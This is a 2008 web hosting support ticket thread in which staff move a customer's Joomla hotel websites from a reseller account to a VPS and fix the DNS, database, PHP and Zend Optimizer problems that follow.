>>Is there a comprehensble doc?
http://www.suphp.org
Best regards,
Posted On: 02 Mar 2008 01:56 PM
Hi,
as far as I can see the sites are working properly.
1/what is the next step for the transfer then?
I guess are you going to shut down the reseller account in order to join it with the vps.
2/is it possible tht you keep 1 main backup of all accounts at this time please.
I probably can learn how to do that from the viruozzo interface or WHM but I'd like to make sure at this point that it's done properly.
3/Also, since it looks like you are making many custom changes for security on my vps (the more the better because i'm using only joomla and looks like it's not the safest thing), can you please make a list of the special modules and special settings (or things to beware / recommendations) so I can refer to it please.
Thanks a lot
kindly
Posted On: 02 Mar 2008 02:35 PM
Hello Matthieu,
1.
All sites that on your vps is use dns:
NS ns1.rootshosting.net
NS2 ns2.rootshosting.net
now this dns is locate on our dns server, when all sites will be migrate to vps needed change this dns to new ip that on vps.
2.
Monthly backyp will be keep until next month.
If needed we could copy backup from shader server to your vps.
In viruozzo you could not make any backups, we produce backup of whole vps twice in a week(it's backup of whole vps). In WHM you could configuration backup as you need(daily,weekly,monthly, copy on other server and other option).
3.
On vps we could install mod_security, and turn off some function in php. Also we could install suphp on server but if joomla have security hole, (it's don't help save sites). I'm strongly recommended regular update joomla to latest version.
Posted On: 04 Mar 2008 01:41 PM
Hi,
I was going around the sites, virtuozzo and whm.
1/If I understand properly only 4 sites have been migrated so far (hotelcra/hotelcom/hotelmon/reggae) right?I think it'd be worth transferring all the sites and see what's happening... just have to be ready to swap back to old version if major problem on some.
2/ on virtuozzo main panel I see that I have 54% of disk usage. This is very strange but maybe I stored many backups around.What is the best way you recommend for me to scroll through all my websites files...? (also I can't locate my files within virtuozzo yet (still going through the doc)but it's urgent i access a main file manager because I want to clean up my sites in order to install the automatic backups (for which I must keep much space)
3/ Thank you for the info about updates of joomla and security.What I want to know really is how it's going to look like when files and folders are not in 777 anymore... and what will happen when I install new apps and extensions... will I have to re-chmod them? how...? If this is a too big question or out of your "jurisdiction", you don't have to answer... light will come with who walks through darkness with a pc
and then I will be waiting for next step
KindlyMatthieu
Posted On: 04 Mar 2008 03:20 PM
1.
Yes, this 4 account was on your vps now.
Firstly need create dns server on vps. That dns do you use on vps?
2.
You vps use 55% of disk space.
-bash-3.00# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/vzfs 16G 8.5G 7.2G 55% /
We could remove backup on sites that was leave on vps after migration.
-bash-3.00# ls -lah /home/cprestore/
total 2.6G
drwx------ 2 root root 1.0K Mar 1 09:09 .
drwx--x--x 10 root root 1.0K Mar 1 09:09 ..
-rw------- 1 root root 8.2M Mar 1 09:08 hotelcom.tar.gz
-rw------- 1 root root 2.4M Mar 1 09:07 hotelcra.tar.gz
-rw------- 1 root root 56M Feb 29 17:57 hotelmon.tar.gz
-rw------- 1 root root 2.6G Feb 29 18:08 reggae.tar.gz
Posted On: 04 Mar 2008 11:47 PM
hi,
thanks for reply.
in your first answer you say: "Firstly need create dns server on vps." That dns do you use on vps?"
Do I have to do that? or is that done by migration team?
" That dns do you use on vps?"
sorry, I dont' understant.... I use ns1.rootshosting/ns2..... usually if that was your question
regarding the backups it's ok, I'll look into that later, as long as we can backup regularly until the whole transfer is done.
So should I wait that you contact me for transfer or is it something I should do myself?
if it's you, please go ahead....
Kindly
Posted On: 05 Mar 2008 12:26 AM
Hi,
This dns dont work from vps:
ilyalevel3:~$ host ns1.rootshosting.net
ns1.rootshosting.net has address 66.225.219.9
ilyalevel3:~$ host ns2.rootshosting.net
ns2.rootshosting.net has address 69.61.10.11
They work from our dns cluster. Recommend you migrate account reggaegu from shared host to vps.
Provide list of account that need migrate to vps and we help do it.
Posted On: 05 Mar 2008 03:19 AM
Hi,
I think I start to understand where we're misunderstanding one another ^_^
actually I want to transfer all accounts to vps, then close the reseller and add time to vps from reseller account money left.
and I will run vps with one account the way I was running the reseller.
upgrade is just only for improve security on all websites
Thanks a lot
Kindly
Posted On: 05 Mar 2008 05:44 AM
Greetings! We can migrate you from a reseller to VPS, all actions concerning refund are also available. Everything you ought to do, it's to order a VPS and make here a migration request or if you already have it just tell us what to migrate.
Valery B.
Migration Services Department
Posted On: 11 Mar 2008 01:35 PM
Hi,
Sorry for late reply, I was out of internet for a whole week... happens around here...
Actually I though that I'd requested the whole transfer of all my Reseller's account to the new VPS account and the cancellation-retribution of the Reseller to the VPS.
If I didn't, please go ahead and tell me after it's finished so I can go around and check all websites.
Kindly
Matthieu
Posted On: 11 Mar 2008 01:40 PM
Hello,
What is the ticket ID of your migration reuest?
Or please confirm your reseller and VPS WHM details so we can compare acconts there.
Posted On: 12 Mar 2008 11:35 AM
hi,
^_^ well ... I'm don't think that one is opened actually...
but since this one is under "migration department" couldn't we just use it as a migration request?
Matthieu
Posted On: 12 Mar 2008 11:53 AM
Sure we after we migrate you we will let you know.
Migration Services Department
Posted On: 13 Mar 2008 02:44 AM
Matthieu please provide me with the info of accounts which should be migrated, it is 8 pages here, I think it would be better to avoid mistake.
Where to migrate:
Main IP:
root:
here accounts which we ought to migrate, login passwords.
Posted On: 13 Mar 2008 07:52 AM
hi,
I'm not sure anymore...
My old account is reseller user = reggaegu and I want that whole account with all accounts under it to be migrated to new vps server which I think has user = root
Is that enough information ?
(I hope yes because I'm not sure exactly how the vps works
this is the info I got for vps:
Server Name: server.rootshosting.netOperating System: CentOS with WHM/CPANELMAIN IP: 66.225.216.125 <-- Use this to connect to your server via SSH or web.Initial IP address allocation: 66.225.216.125-127Root Access Password (username: root): .............)
Kindly
Posted On: 13 Mar 2008 10:53 AM
I've started migration to your VPS, after we complete I'll let you know.
Migration Services Department
Posted On: 13 Mar 2008 11:22 AM
All your accounts have been migrated. Please check all data and after all do not forget to change DNS at your register.
Migration Services Department
Posted On: 13 Mar 2008 12:07 PM
hello,
so far it all looks fine, thanks
I'll be checking all websites the coming few days before I delete the reseller.
I'm not in a hurry for that since I owe you for the custom setup that will be made.
please keep ticket open, I'll contact next week the person I was talking with regarding my vps setup then I'll delete the reseller later.
thanks a lot.
Kindly
Posted On: 13 Mar 2008 12:08 PM
by the way, I didnt have to change dns at registrar...
Posted On: 13 Mar 2008 12:17 PM
Matthieu if you change DNS and cancel your reseller your sites will not available in the net.
Posted On: 13 Mar 2008 12:28 PM
sorry if I dont understand:
Now my sites are displaying. I guess it's from the VPS or is it from reseller still?
I dont intend to change dns (I thought you asked me to)
if what I see online now for my urls is vps, then I'm all good and I'll ask more question about the vps setup during next week. I'll try to reach directly the person that I think is most aware of my case.
Thanks a lot for your help
Kindly
Posted On: 13 Mar 2008 12:40 PM
DNS is still points to
Your NS records at the parent servers are:
ns1.rootshosting.net. [66.225.219.9] [TTL=172800] [US]
ns2.rootshosting.net. [69.61.10.11] [TTL=172800] [US]
(to the reseller package)
Flash Tutorials!http://www.hostforweb.com/flash.html
Posted On: 14 Mar 2008 07:54 AM
Hi,
sorry, I do not know how to change that.
I also think that this was setup by hfw during last upgrade ... I am not even sure what to change ...
should I change settings of ns1.rootshosting.net and ns2.rootshosting.net to make them point to the new main IP?
sorry, I'm confused.
Kindly
Posted On: 14 Mar 2008 08:04 AM
Hello,
We'll change your DNS settings once you provide a copy of your welcome email for your new account.
Posted On: 14 Mar 2008 01:20 PM
Posted On: 14 Mar 2008 01:31 PM
There's blank email. Please resend.
Posted On: 14 Mar 2008 01:34 PM
We are pleased to present you with your VPS serverwhich has been successfully setup and installed. Here is theinformation pertaining to your vps server: Server Name: server.rootshosting.netOperating System: CentOS with WHM/CPANELMAIN IP: 66.225.216.125 >>>>>>>>>>>>>>>>> Billing username: rootshosting.net Please see below for frequently asked questions by our VPS customers. ========================================================Q. How do I access the Virtuozzo Power Panel (VZPP)? Virtuozzo Power Panels (VZPP) is a powerful web-based recovery and administration tool,intended for use by VPS owners. With VZPP, a user with administrative access to a VPS caneasily perform many critical management tasks: https://YourMainServerIPhere:4643 (see above) Username: rootPassword: Root_Access_Password (see above) ========================================================Q. How do I access my VPS Web Host Manager (WHM)? Web Host Manager (WHM) is where you manage your VPS. You can setup your DNS, create packages, create new accounts, check your VSPstatistics, and more. To Access your WHM you need to enter one of the following into your browser: http://YourIpAddress:2086ORhttp://YourDomain.com:2086 A login prompt will appear and you will need to enter the following information: Username: rootPassword: (your root password, see above) ========================================================Q. How do I access the control panel for the accounts I create (CPANEL)? Cpanel is where you manage your individual accounts. You can setup e-mail accounts, manage your files, manage FTP access, viewstatistics, and more. To Access your Cpanel you need to enter one of the following into your browser: http://AccountsIpAddress:2082ORhttp://AccountsDomainName.com:2082 A login prompt will appear and you will need to enter the following information: Username: (accounts username)Password: (accounts password or root password) ======================================================== Q. How do I setup my VPS main DNS? Your main DNS will be automatically setup on your VPS server.* Follow the steps below to register your DNS with your domainregister: 1) Select 2 Ip addresses from the ones assigned to you. You can select any of the Ip address, but we recommend the followingconfiguration: ns1.YourNameServer.com --> Main Ip Addressns2.YourNameServer.com --> Next Ip Address allocated to you 2) Register your Nameservers with your Register (where you bought your domain name). Login to your account at your domain registeror contact your domain register to setup your Nameservers. Setting up Nameservers or Host Name Servers is different than assigningDNS to your domains. You need to create the Nameservers with your register in order to assign them to other domains. 3) Once you have created your Nameservers, it will take 24-48 hours before they are fully propagated (working). When they arefully propagated, you will be able to assign them to any domains you have added to your VPS account. 3) When your Nameservers are created and fully propagated, we recommend that you create A records. Login to WHM and click on "EditSetup" (first link on the upper left, under "Server Setup"). Scroll down to Primary & Secondary DNS. Click on the "Add an A entryfor this Nameservers" button next to both Primary & Secondary DNS. Confirm the information and click "Add Entry". *If you would like to edit your DNS settings, once you are logged into your WHM click on "Edit Setup" (first link on the upperleft, under "Server Setup"). ========================================================Q. How do I change my DNS Ip's? If you currently pre-existing Nameservers, please follow these steps to set them up. 1) Select 2 Ip addresses from the ones assigned to you. You can select any of the Ip address, but we recommend the followingconfiguration: ns1.YourNameServer.com --> Main Ip Addressns2.YourNameServer.com --> Next Ip Address allocated to you 2) Update your Nameservers Ip's with your Register (where you bought your domain name). Login to your account at your domainregister or contact your domain register to update your Nameservers. 3) Once you have updated your Nameservers, it will take 24-48 hours before they are fully propagated (working). When they arefully propagated, you will be able to assign them to any domains you have added to your VPS account. 3) When your Nameservers are updated and fully propagated, we recommend that you create A records. Login to WHM and click on "EditSetup" (first link on the upper left, under "Server Setup"). Scroll down to Primary & Secondary DNS. Click on the "Add an A entryfor this Nameservers" button next to both Primary & Secondary DNS. Confirm the information and click "Add Entry". *If you would like to edit your DNS settings, once you are logged into your WHM click on "Edit Setup" (first link on the upperleft, under "Server Setup"). ========================================================Q. How can I migrate my accounts from a HostForweb Reseller package to my new VPS? Email migrationhostforweb.com with your old account information and your new VPS account information. Include details of what youneed migrated and setup on your VPS server. Migration will alert you that your migration is complete. Once your account ismigrated, you will be able to change your Nameserver Ip's at your register to the ones you have selected. See above for moreinformation on updating your Nameserver Ip's. ========================================================Q. How can I migrate my accounts from another server Reseller package to my new VPS? There are a few basic steps that you can do to transfer your accounts to your new VPS.HostForWeb does not assist in migrating your accounts from a third party server, here are the steps: 1) Create an account in WHM where the BACKUPS will be sent 2) For each account, log into your old reseller cpanel 3) Click on Backup then Generate/Download a Full Backup 4) Enter the required settings to FTP the backup to a remote FTP server (with the account settings you created in WHM earlier) 5) After all backups are moved to the VPS, log into your server using SSH (login: root) 6) cd /home/username (cd to the account you created in WHM earlier) 7) mv backup* .. 8) Log into your WHM and use Restore a Full Backup/cpmove file to restore the accounts on the server ========================================================Q. Can I setup a shared SSL on our VPS? Yes, it is an extra option. SSL certificate can be installed on any of your domain names and your clients will able to access itas: https://www.YourSecureDomain.com/~username/ ========================================================Q. How can I learn to use Cpanel & WHM features? We have many flash tutorials located here:http://www.hostforweb.com/flash.html You can view Cpanel documentation here:http://www.cpanel.net/docs/cp/ You can view WHM documentation here:http://www.cpanel.net/docs/whm/
Posted On: 14 Mar 2008 01:46 PM
Ok, DNS ips has been updated. Now all sites will be pointed to your new VPS.
Posted On: 14 Mar 2008 01:51 PM
hi,
thanks,
most site look like they are working for frist glance, but
http://www.hotel-montpaisible.ch is not working:
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, webmasterhotel-montpaisible.ch and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Additionally, a 500 Internal Server Error error was encountered while trying to use an ErrorDocument to handle the request.
Posted On: 14 Mar 2008 01:53 PM
http://www.hotel-a-to-z.com shows:
DB function failed with error number 1146Table 'hotelato_joom1.jos_session' doesn't exist SQL=SELECT session_id FROM jos_session WHERE session_id = '973fd82bce125c8a7b'SQL = SELECT session_id
FROM jos_session
WHERE session_id = '973fd82bce9125c8a7b'
Posted On: 14 Mar 2008 09:32 PM
hi,
I mentionned last night that some of my sites are not working since the transfer to VPS.
Actually I can see now that more websites have problems.
Sorry, I dont' understand what I should do about that...
Do I have to make all these websites again or is it just some settings of the VPS that you will adjust?
Now I have 2 urgent issues with www.hotel-montpaisible.ch and www.rayonghomeandland.com
Other webisites seem to be unable to reach the database at all and display errors.
Kindly
Posted On: 14 Mar 2008 09:49 PM
I copied the whole error message in the mail... I don't know more than that...
the whole site www.hotel-montpaisible.ch is down
the site www.rayonghomeandland.com looks ok but actually the main component doesn't work properly
www.hotel-a-to-z.com, www.rootshosting.net and several others seem to be unable to resolve database access.
I'm still looking around but it looks like the new VPS thing is not working for me.
I think I should reverse to the old account now if it's still time... my customers are going to start to be upset.
Kindly
Posted On: 15 Mar 2008 12:40 AM
Hi,
Site www.hotel-montpaisible.ch work. For site www.hotel-a-to-z.com need restore database hotelato_joom1. Where can we take backup on this database?
Posted On: 15 Mar 2008 01:20 AM
hi,
the websites that display db error, if need to restore db backup, i'll try to do that on my own coz it's not urgent and i'd like to get more familiar with the system. I'll let u know if i can't.
both sites in emergency are ok now, THANKS SO MUCH.
the rest is not vital and I'll give it a sweat myself.
I'll keep in touch
Kindly
Matthieu
PS. Sorry for the noise about the ticket answers, i got confused with the department changes of the ticket...
Posted On: 15 Mar 2008 04:19 AM
Matthieu please let us know if you need any assistance.
Posted On: 15 Mar 2008 12:07 PM
hi,
I can access the old reseller WHM or webistes, but I can't seem to be able to backup a database from them (I get empty db upon backup and can't find the right url to login individual cpanel).
please tell me how I can backup a db from the offline reseller.
Kinldy
Matthieu
Posted On: 15 Mar 2008 01:03 PM
Hello,
You need to access your accounts through the IP address. It would be better to login to old reseller's WHM -> "List accouts" to see all IPs.
Posted On: 16 Mar 2008 09:43 AM
Hi,
thanks for advise.
I actually have tried that before and from "list accounts" I click on the websites cpanel icon.
but from there the database I download is empty.
I thought it was because maybe I need to login from the www.url/cpanel, but I couldn't find out how.
so actually I'm not able to download the old db from reseller's account eventhouh the sites are up on it... that's why I wrote that mail.
second thing in this post:
one of the websites: www.rayonghomeandland.com looks like it's running, but all content items are not accessible.
it did that just after transfer, but then when you fixed www.hotel-montpaisible.ch, rayonghomeandland went ok.
but today it went half empty again... strange.
what is there to do then?
Kindly
Matthieu Lagier
Posted On: 16 Mar 2008 09:46 AM
Correction, there's a third issue for today:
www.hotel-montpaisible.ch is opening today but unlike yesterday the javascript menu on the side doesn't appear anymore.
that was ok yesterday.
Kindly
Matthieu
Posted On: 16 Mar 2008 10:23 AM
Matthieu, could you please explain what can we do for you?
Thank you.
Posted On: 16 Mar 2008 11:19 AM
hi,
I don't know how to put it...
it's all in the ticket.
it's ok if I have to wait for somebody how's already handled the ticket so he doesn't have to read it.
Please tell me when somebody recently involved in this ticket will return.
Thanks
Matthieu
Posted On: 16 Mar 2008 04:40 PM
Hi,
Now into http://www.hotel-montpaisible.ch/ left menu works.
Posted On: 16 Mar 2008 04:44 PM
Hello,
On which sites are you still seeing database errors?
Posted On: 16 Mar 2008 05:07 PM
Hi,
thanks for reply.I went around all websites and noticed 4 different error type as per the following:
1. actually www.hotel-montpaisible.ch and www.hotel-delaforet.ch now displays the menu but links on it don't open eventhough url points to an existing html file. Files are still there, i can see them on "file manager", but browser says tht page can't be displayed...
2. www.rayonghomeandland.com, www.hotel-web-designer.com, www.securehotelbooking.com, www.yuwie-travel.com/: site opens and some pages open properly, so does the menu, but the rest of the db seems unaccessible
3. Different db problem on sites: www.rootshosting.net, www.hotel-a-to-z.com: I get db error messages such as: DB function failed with error number 1146
"Table 'reggaegu_joom1.jos_session' doesn't exist SQL=SELECT session_id FROM jos_session WHERE session_id = '3e77fb1c70342c3a24ffdbe361cbd49f'SQL =
SELECT session_id FROM jos_session WHERE session_id = '3e77fb1c70342c3a24ffdbe361cbd49f' "
4. Page doesn't open at all:http://www.hotelcransmontana.ch/, http://www.hotel-crans-montana.com/
5. only one account www.rootsreggaeclub.com and sites under it appear to be ok
Kindly
Matthieu
Posted On: 16 Mar 2008 05:29 PM
1. Which links at these sites are producing 404s? When I test, for instance: L'Hôtel links to http://www.hotel-montpaisible.ch/FRA/hotel_1.htm which loads normally, Le Restaurant links to http://www.hotel-montpaisible.ch/FRA/restaurant1.htm which loads normally, etc. Similarly with hotel-delaforet.ch.
2, 3. The databases at these sites appear to be incomplete. It's like the database dumps that were restored to your VPS were slightly corrupt. Is it OK if I migrate these DBs again manually? This includes:
homeandl_joom1
hotelweb_joom1
hotelboo_joom1
travelyu_joom1
reggaegu_joom1
hotelato_joom1
4. This appears to be due to an issue with PHP. Apache is segfaulting. I'm still investigating this.
Best Regards,
Erik R.
HostForWeb Support
Matthieu Lagier
Posted On: 16 Mar 2008 05:34 PM
hello,
1, yes i can see that they are working now, somebody was probably working on the files when I checked earlier
2,3 yes it's ok if you migrate db manually (I tried to do so myself but couldnt locate the db backup of whm)
thanks,
Matthieu
Posted On: 16 Mar 2008 05:38 PM
Hi,
1. Both www.hotel-montpaisible.ch and www.hotel-delaforet.ch was fixed.
2. For http://www.hotel-a-to-z.com/ and http://www.rootshosting.net/ i've remigration database.
4. Checks this sites.
Posted On: 16 Mar 2008 05:45 PM
Hello,
All 6 databases have been restored. All 6 sites appear to be loading normally now.
Posted On: 16 Mar 2008 06:07 PM
hello,
most of the things that have been reloaded are fine and server looks so fast
so far I have been able to spot the following errors:
a. http://www.hotelcransmontana.ch/hotel_resort_directory/index.php:there is a php script there that doesn't open.I think the db is in cgi if that can help.
b. http://securehotelbooking.com/index.php?option=com_jomres&Itemid=26The main website is ok, but the main component doesn't display. error message mentions ioncube which is one of the encoder used by the developer at install.
c. http://hotel-montpaisible.ch/joomla/index.php?option=com_facileforms&act=run&ff_name=SampleContactFormemail&ff_frame=1all email form joomla based are not diaplaying for this website
d. http://www.hotel-crans-montana.com/: only main page opens, all other internal links from navigation are off
Posted On: 16 Mar 2008 06:17 PM
Hello,
These all appear to be due to PHP issues with your PHP build. I'm rebuilding now. I'll update you shortly once this is complete.
Posted On: 16 Mar 2008 07:51 PM
Hello,
securehotelbooking.com is fixed however there are still segfaults at the other URLs. I'm not sure what's causing these. We're still investigating.
Best Regards,
Posted On: 16 Mar 2008 11:16 PM
Hello,
The issue appears to be due to Zend Optimizer. These scripts no longer segfault with it disabled. However, Zend is required for ionCube (and therefore some of your other scripts) to work, so I'm looking into another version to see if this will resolve the problems.
Best Regards,
Posted On: 16 Mar 2008 11:21 PM
Hello,
All set. These sites are now loading with Zend Optimizer 3.2.8.
Best Regards,
Posted On: 17 Mar 2008 01:36 AM
Hellow,
yes, all major issues are cleared, thanks a lot.
I'll make a thorough check after cut of date and report if necessary.
please keep ticket open.
Thanks again
Kindly
Posted On: 17 Mar 2008 11:48 AM
This post is for Erik R. or Ilya O. and I do not mind waiting until either comes online.
Hi,
I noticed that all websites cpanel now have x3 skin which is fine but strangely when I call www.rootsreggaeclub.com/cpanel I still can see the rvblue skin (while I can't with other urls).
By itself it's not a problem to me but that made me wonder whether rootsreggaeclub.com had been transferred yet... or if something went wrong
I have to say that rootsreggaeclub.com and addon domains with it are the only ones that have been transferred to VPS without any problem... if they've been transferred.
Kindly
Posted On: 17 Mar 2008 12:22 PM
Hello,
Seems that something went wrong during the migration -- www.rootsreggaeclub.com still resides on shared server.
Proceeding with moving the website. The job will be done pretty soon.
Best regards,
Posted On: 17 Mar 2008 02:34 PM
Hello,
Sorry, it was my mistake: the account www.rootsreggaeclub.com has been moved to your server, but it still loads from our shared server. In order to fix this you should go to your domain settings at your registrar's website and set these DNSes as an authorities for the domain rootsreggaeclub.com:
Primary: ns1.rootshosting.net
Secondary: ns2.rootshosting.net
Please allow some time for DNS propagation, and rootsreggaeclub.com will load from its new location.
Feel free to contact us if you have any questions.
Best regards,
Posted On: 17 Mar 2008 10:16 PM
thanks,
please tell me what url I should use to check on condition of rootsreggaeclub.com on VPS before dns change please
Kindly
Matthieu
Posted On: 17 Mar 2008 10:57 PM
Hello,
http://66.225.216.125/~reggae/ will work for this domain.
Best Regards,
Erik R.
HostForWeb Support
Matthieu Lagier
Posted On: 18 Mar 2008 12:24 AM
hi,
then I did it right the first time. I get following error message on http://66.225.216.125/~reggae/
"
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, roottemplate.ve.net and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Apache/1.3.41 Server at server.rootshosting.net Port 80"
Matthieu
Posted On: 18 Mar 2008 12:27 AM
Hello,
PHP 5 does not appear to enabled as an addon for this server. Your reggae account is configured with php5_flag directives which rely on this. If the reggae account requires PHP 5 we can go ahead and build this addon for you.
Best Regards,
Posted On: 18 Mar 2008 07:48 AM
hi,
THIS TICKET IS NOT URGENT AND CAN WAIT FOR ERIK R. TO COME BACK ONLINE.
are you referring to the fact that this account has addon urls?
is that a problem with the new hosting system?
I don't know what's with PHP 5 ... this is the first accoutn I ever had with you and everything was built from rootsreggaeclub.com originarily... but I never asked or performed any server side modifications on that webiste other than adding reggaeguesthouse.com and bookhostelbook.com as addons.
If this is php5_flag directives then yes, I think they should be built... and also if I have 3 different IPs, this account could have it's own IP. //// securehotelbooking.com also could have it's own IP
If you think that it's something I should learn to do myself please say so and I'll give it a go.
Kindly
Posted On: 18 Mar 2008 04:51 PM
Hello,
No, it appears this site is running PHP 4, however both PHP 4 and PHP 5 are active on our shared servers and there were a few additional php5_flag directives left lying around in the reggae account. It's no problem if you'd like us to build and activate PHP 5 as option on this server, too, but it doesn't appear the reggae was taking advantage of this
Posted On: 18 Mar 2008 11:34 PM
hello,
THIS TICKET IS NOT URGENT AND CAN WAIT FOR ERIK R. TO COME BACK ONLINE
thanks for the explanation.
well, isn't it better to always be with the latest version of PHP?
Please feel free to install all the things that you think are necessary or could become necessary in the future for somebody like me who uses extensively open source products and joomla.
You don't need to ask approval from me and I guess that for PHP 5 it should be installed.
For all security modules and things, this will be taken care of by somebody I was in contact with at the start of this enormus ticket.
Kindly
Posted On: 19 Mar 2008 04:12 PM
Hello,
I'll go ahead and install PHP 5 as an add-on then. This allows you to run PHP 4 and PHP 5 simultaneously.
The main reason to leave PHP 4 as the main PHP is that some scripts don't run out of box on PHP 5, but if all your scripts are PHP 5-compatible, you can do away with PHP 4. I would test them out using the add-on first if you're thinking of going that route, we can always do a complete upgrade later.
Posted On: 19 Mar 2008 06:05 PM
Hello,
All set. You can enable PHP 5 for a domain by adding:
AddType application/x-httpd-php5 .php
the .htaccess for that domain.
Best Regards,
Posted On: 20 Mar 2008 12:57 AM
Hi,
this ticket is NOT urgent and can wait for ERIK R. to come back online.
Thanks a lot for your explanations.
Actually when I checked http://66.225.216.125/~reggae/ it opened properly while the add type php5 line was not yet in the .htaccess
I checked on the addon domains for this site:
http://66.225.216.125/~reggae/bookhostelbook/ this site is in iframes and the frameset comes up, but frames are empty (each of them displays "page cannot be fount")
http://66.225.216.125/~reggae/reggaeguesthouse/ this sites opens but some pictures don't come up and some php script (a magpierss reader) does not come up properly
I put up the php5 addon type in all .htaccess of all 3 domains rootsreggaeclub/bookhostelbook/reggaeguesthouse just in case and got the same result.
Kindly
Posted On: 20 Mar 2008 01:28 AM
Greetings,
This is limitations of mod_userdir. If you will set real domain to this accounts - iframes and pictures will show up without any problems.
Best regards,
Posted On: 20 Mar 2008 02:12 AM
Hi,
I got that and will comply ^_^
Thanks
Posted On: 20 Mar 2008 02:18 AM
Hello,
Placing ticket on hold.
If you need anything else, let us know.
Best regards,
Posted On: 20 Mar 2008 12:17 PM
Hi,
When I create new accounts via WHM the default DNS is default hostforweb and not mine (ns1&2.rootshosting.net), regardless of the DNS settings I use at creation time.
I always end up with ns41&42.hostforweb.net
Kindly
Posted On: 20 Mar 2008 12:28 PM
Hello, this is because you are on a shared server, if you would like to use custom nameservers please provide us with the ip address to name translations you would like in your zone and we can change them after account creation.
Thanks,
Posted On: 20 Mar 2008 12:30 PM
Hi,
Sorry, I don't understand... I thought I was on VPS...
and my nameservers exist already... it's just that when I select them, they are not selected, ns41/42.hfw.net is selected instead.
Kindly
Posted On: 20 Mar 2008 01:18 PM
Hello,
All OK, your ns is ns1&2.rootshosting.net.
When you use our shared your NS was ns41/42.hfw.net - this NS owned by shared
ns1 14400 IN A 66.225.216.125
ns2 14400 IN A 66.225.216.126
And we can create custom nameservers for your accounts on your VPS
Posted On: 20 Mar 2008 03:22 PM
Hi,
actually not... when I was on shared (reseller) I was already using ns1&2.rootshosting.net, and when I was making an new account i was having them by default.
now on VPS I still can see them at account creation, but I can't seem to be able to select them then.
...
or am I misunderstanding something ?
Kindly
Posted On: 20 Mar 2008 06:25 PM
Hi, Matt.
You can use "Edit DNS Zone" from WHM if you aren't satisfied with defautls Cpanel provided.
Let us know if you have any questions.
Posted On: 20 Mar 2008 10:47 PM
I'm sorry mr Arthur D but when you migrate a site that has a specific dns by default it should end up with a specific dns by default on the other side
why is it that it's always Arthur jD that gives the most useless and careless answers?
please finish migration as it should be and reset my default dns to ns1.rootshosting.net and ns2.rootshosting.net.
and is there a way to avoid having this Arthur D read my tickets in the future?
Kindly
Posted On: 20 Mar 2008 11:04 PM
Hello,
Your nameservers for all zones are as follows:
Posted On: 20 Mar 2008 11:07 PM
Hi,
I don't see any error message.
It's just that when I make a new account it's impossible to set ns1 and ns2.rootshosting.net as dns.
it will always go to ns42 and 42.hostforweb, regardless of the DNS settings I put. Even if it will show me rootshosting.net on the page, when I look at the result after account creation it hosforweb.net, not rootshosting. I tried half a dozen time and always ended up with the wrong dns.
Kindly
Matthieu
Posted On: 20 Mar 2008 11:15 PM
Hello,
Can you try now? There's a setting under WHM > Tweak Settings, "When adding a new domain, if the domain is already registered, ignore the configured nameservers, and set the NS line to the authoritative (registered) ones." If this is checked, the registrar nameservers will be inserted instead of your default nameservers. This is the cPanel default and that setting isn't migrated when your accounts, so, that could be cause. I've unchecked it now.
Best Regards,
Posted On: 21 Mar 2008 07:33 AM
Hi,
That was the case.
It gives me the right dns now at account creation.
Thanks a lot
Kindly
Posted On: 21 Mar 2008 08:09 AM
Great.
Please let us know if you need any further assistance.
Best regards,
Posted On: 21 Mar 2008 09:51 AM
Hi,
Sorry, I use this ticket again because I think it is still part of the migration.
This issue is not urgent and reports what looks like a bug in virtuozzo file manager's editor.
This is happening on new VPS for website http://server.rootshosting.net/~guesthou/
I have created a new account (reggaeguesthouse.com) with WHM and all went well.
I then went on virtuozzo and migrated the files and all went well.
but when I edit "index.htm" through virtuozzo file manager, it won't save the whole script I put in and only bits of it (I tried only this file for now but did it 4 times and always got the same error).
I can upload the file and have it display properly, but if I edit it and save it (with or without modification) the script will be cut again.
I thought I'd report that because it looks like a bug in virtuozzo.
Kindly
Posted On: 21 Mar 2008 10:29 AM
I have just checked and this vps node is running the latest stable version of virtuozzo. I was thinking prhaps it needed an update but this doesnt seem to be the case. For now until there is a new version I would suggest either using cPanel/WHM for this or use ftp or sftp to upload files, editing on your local machine. If you need a ftp/sftp client there is a free one available named 'filezilla' that works well and is fairly intuitive. i'm sorry I cannot fix the vzpp, it will have to be taken care of upstream by the virtuozzo team. Sorry for any inconvenience this poses.
Posted On: 21 Mar 2008 10:48 AM
Hello,
regarding last reply:
no problem, as I said I can come around by uploading a file by virtuozzo or anything else, that works, I was just reporting this bug to you
Thanks a lot for the reply though
regarding an earlier case:
"Stas S. Posted On: 20 Mar 2008 01:28 AMGreetings,
This is limitations of mod_userdir. If you will set real domain to this accounts - iframes and pictures will show up without any problems."
I have created an individual domain for this website (bookhostelbook.com) and I migrated the files successfuly.
nevertheless http://server.rootshosting.net/~hostelbo/ frameset displays only empty frames and title. (iframes url are relative so there should not be a dns issue)
Kindly
PS. That is hopefully the last issue before we can migrate the last website rootsreggaeclub
Posted On: 21 Mar 2008 10:11 PM
Hi,
I posted in this ticket yesterday about frameset displaying empty frames. I'm NOT awaiting an urgent reply but I see now that the ticket is closed while not answered.
I'm pretty sure that the script is ok (I have not changed it since migration) and that the frames should display since path is relative...
I'm waiting for this last fix in order to complete migration of rootsreggaeclub.com, the last site to move to rootshosting.net.
Kindly
Posted On: 21 Mar 2008 11:01 PM
Hello,
The problem is with your frameset. You should remove leading slashes from the frame locations, as leading slash references to absolute, not relative path.
Best regards,
Posted On: 23 Mar 2008 01:56 PM
Hello,
Regarding my new VPS accounts, I see that Fantastico is not installed... or it's not accessible the same way as before.
is it something I should ask specifically? if yes then please install it.
Kindly
Posted On: 23 Mar 2008 02:10 PM
Hello,
Can you please confirm IPs and passwords of these servers?
Thank You.
Posted On: 23 Mar 2008 05:06 PM
Posted On: 23 Mar 2008 05:20 PM
Hello,
Fantastico has been installed.
Posted On: 25 Mar 2008 08:04 AM
Hello,
going around WHM and VZ I notice that resources usage is particularly high:
VZ:
Resource
Capacity
CPU
62.0%
Load Average
2.2, 2.08, 2.04
System Usage
Resource
Capacity
System
87.75%
WHM:
User: nobody
Domain:
%CPU: 94.1%
%Mem: 1.4%
Mysql: 0
